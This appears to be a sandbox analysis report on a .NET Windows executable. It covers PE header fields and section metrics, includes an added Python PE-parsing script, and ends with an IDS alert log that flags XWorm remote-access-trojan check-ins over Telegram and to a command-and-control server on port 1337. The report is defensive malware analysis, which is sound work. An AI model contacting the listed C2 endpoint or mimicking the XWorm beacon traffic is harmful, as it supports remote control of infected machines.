                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag.................D...........b... ........@.. ....................................@................................
                                                Icon Hash:90cececece8e8eb0
                                                Entrypoint:0x4162fe
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x6741C995 [Sat Nov 23 12:24:53 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al        (repeated 97 times in the original listing)
The entry point is the standard native stub of a .NET executable: a six-byte indirect jmp through the IAT slot at RVA 0x2000 (image base 0x400000), which holds the file's single import, mscoree.dll!_CorExeMain; the CLR then takes over from the COM descriptor at RVA 0x2008. The bytes after the stub are zero, and 00 00 disassembles as add byte ptr [eax], al, so the repeated line is padding, not code.
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x162a8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x18000 | 0x4ce | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x14304 | 0x14400 | b2be1f6f1bfc65fc3c4a3fc60f4419dd | False | 0.6075544945987654 | data | 6.069007239627802 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x18000 | 0x4ce | 0x600 | 7be5f4e146d6be4867ab3153d9398091 | False | 0.373046875 | data | 3.7127590787932885 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1a000 | 0xc | 0x200 | d1bf243a2397e1e9e1b146da36d98cd1 | False | 0.041015625 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x180a0 | 0x244 | data | | | 0.4689655172413793
RT_MANIFEST | 0x182e4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
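The static fields above (per-section MD5, 8-bit entropy, ZLIB complexity, the IAT and COM_DESCRIPTOR directories, the single mscoree.dll import) can be reproduced and cross-checked with a short parser. The script below is an added example, not Joe Sandbox's own code: it parses a PE32 header, computes the section metrics, and verifies the managed entry stub that the disassembly shows (an FF 25 indirect jmp whose operand is image base plus the IAT directory RVA, next to a non-empty CLR header). It runs on a constructed toy PE32 built inline with the same layout as this sample, not on the sample itself; the definition of "ZLIB Complexity" as compressed length over raw length is an assumption about the report's metric.

```python
"""Reproduce the static fields tabulated above (per-section MD5, 8-bit entropy,
ZLIB complexity) and verify the managed entry stub behind the disassembly:
'jmp dword ptr [imagebase + IAT RVA]' through the single mscoree!_CorExeMain
import, with a CLR header in the COM_DESCRIPTOR directory. Added example, run
on a constructed toy PE32 rather than on the analysed sample."""
import hashlib
import math
import struct
import zlib
from collections import Counter

DIR_IAT, DIR_COM_DESCRIPTOR = 12, 14  # IMAGE_DIRECTORY_ENTRY_* indices


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy: 0.0 for constant bytes, 8.0 for uniform bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def zlib_complexity(data: bytes) -> float:
    """Assumed definition of the report's 'ZLIB Complexity': compressed length over
    raw length, near 0 for zero padding and near 1 for packed or encrypted data."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def parse_pe32(pe: bytes) -> dict:
    """Entry RVA, image base, data directories and section table of a PE32 image,
    with the metrics above computed over each section's raw bytes."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    opt = coff + 20
    if struct.unpack_from("<H", pe, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    image_base = struct.unpack_from("<I", pe, opt + 28)[0]
    ndirs = struct.unpack_from("<I", pe, opt + 92)[0]
    dirs = [struct.unpack_from("<II", pe, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):  # 40-byte IMAGE_SECTION_HEADER entries follow the optional header
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        raw = pe[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "rawptr": rawptr, "rawsize": rawsize,
                         "executable": bool(chars & 0x20000000),  # IMAGE_SCN_MEM_EXECUTE
                         "md5": hashlib.md5(raw).hexdigest(),
                         "entropy": shannon_entropy(raw), "zlib": zlib_complexity(raw)})
    return {"entry_rva": entry_rva, "image_base": image_base, "dirs": dirs, "sections": sections}


def rva_to_offset(info: dict, rva: int) -> int:
    for s in info["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["rawptr"]
    raise ValueError(f"RVA {rva:#x} maps to no section")


def managed_stub_check(pe: bytes) -> dict:
    """All three keys are True for a .NET PE32: FF 25 at the entry point, its operand
    equal to image base + IAT directory RVA, and a non-empty COM_DESCRIPTOR (CLR header)."""
    info = parse_pe32(pe)
    off = rva_to_offset(info, info["entry_rva"])
    target = struct.unpack_from("<I", pe, off + 2)[0]
    iat_rva, _ = info["dirs"][DIR_IAT]
    _, clr_size = info["dirs"][DIR_COM_DESCRIPTOR]
    return {"jmp_indirect": pe[off:off + 2] == b"\xff\x25",
            "jmp_target_is_iat": target == info["image_base"] + iat_rva,
            "has_clr_header": clr_size != 0}


def build_toy_pe() -> bytes:
    """Constructed PE32 shaped like the tables above: .text at RVA 0x2000 holding the
    IAT slot, the CLR header and the entry stub, plus a .rsrc section. Not the sample."""
    image_base, text_va, rsrc_va = 0x400000, 0x2000, 0x4000
    text = bytearray(0x200)
    struct.pack_into("<I", text, 0x00, text_va + 0x80)   # IAT slot (hint/name placeholder)
    struct.pack_into("<I", text, 0x08, 0x48)             # CLR header 'cb' field
    struct.pack_into("<BBI", text, 0x100, 0xFF, 0x25, image_base + text_va)  # jmp dword ptr [0x402000]
    rsrc = bytes(range(256)) * 2                         # uniform bytes, so entropy 8.0
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    struct.pack_into("<I", opt, 16, text_va + 0x100)     # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<I", opt, 92, 16)                  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * DIR_IAT, text_va, 8)
    struct.pack_into("<II", opt, 96 + 8 * DIR_COM_DESCRIPTOR, text_va + 8, 0x48)
    hdr = b"MZ" + bytes(58) + struct.pack("<I", 0x40) + b"PE\0\0"
    hdr += struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102) + opt
    hdr += struct.pack("<8sIIIIIIHHI", b".text", len(text), text_va, len(text), 0x200, 0, 0, 0, 0, 0x60000020)
    hdr += struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), rsrc_va, len(rsrc), 0x400, 0, 0, 0, 0, 0x40000040)
    return hdr.ljust(0x200, b"\0") + bytes(text) + rsrc


if __name__ == "__main__":
    pe = build_toy_pe()
    for s in parse_pe32(pe)["sections"]:
        print(f"{s['name']:<6} md5={s['md5']} entropy={s['entropy']:.3f} zlib={s['zlib']:.3f} exec={s['executable']}")
    print(managed_stub_check(pe))
```

To apply it to a real file, pass `open(path, "rb").read()` to `parse_pe32` and `managed_stub_check`; on this sample the expected result is the section rows above (entropy 6.07 for .text, 0.08 for the zero-padded .reloc) and all three stub checks True, since the entry jmp references 0x402000 and the IAT directory sits at RVA 0x2000.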
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-23T21:05:09.461983+0100 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.4 | 49731 | 149.154.167.220 | 443 | TCP
2024-11-23T21:05:22.034934+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:22.397821+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:05:22.465831+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:35.078050+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:05:35.078050+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:05:35.451440+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:05:35.453664+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:46.991636+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:05:46.994001+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:59.267623+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:05:59.277702+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:05.101176+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:05.101176+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:11.549167+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:11.559813+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:13.131562+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:13.137609+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:14.643237+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:14.645165+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:14.853519+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:14.855413+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:20.167925+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:20.174352+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:25.137384+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:25.181200+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:25.347308+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:25.360656+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:25.513261+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:25.519507+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:30.676427+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:30.678923+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:30.925272+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:31.032166+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:31.034909+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:31.054378+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:35.112652+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:35.112652+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:41.039461+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:41.453248+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:41.533917+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:41.577525+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:41.697319+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:51.654773+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:51.658601+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:51.865118+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:51.868469+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:06:52.611373+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:06:52.613190+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:04.881338+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:04.886631+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:05.114900+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:05.114900+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:06.522645+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:06.524879+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:08.971165+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:08.973095+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:21.272547+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:21.275253+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:26.353000+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:26.355168+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:28.957630+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:28.959846+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:30.374088+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:30.376164+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:35.152096+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:35.152096+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:35.583856+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:35.592877+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:44.662640+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:44.665162+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:47.910781+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:47.913494+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:48.808516+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:48.810715+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:55.471231+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:55.473795+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:07:55.962843+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:07:55.964678+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:03.766636+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:04.155869+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:04.165772+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:05.095467+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:05.095467+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:06.675480+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:06.729947+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:06.899211+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:07.064909+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:17.083526+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:17.086072+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:27.724238+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:27.730954+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:27.973037+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:27.975903+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:28.743924+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
2024-11-23T21:08:28.746440+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:35.150293+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.4 | 49732 | TCP
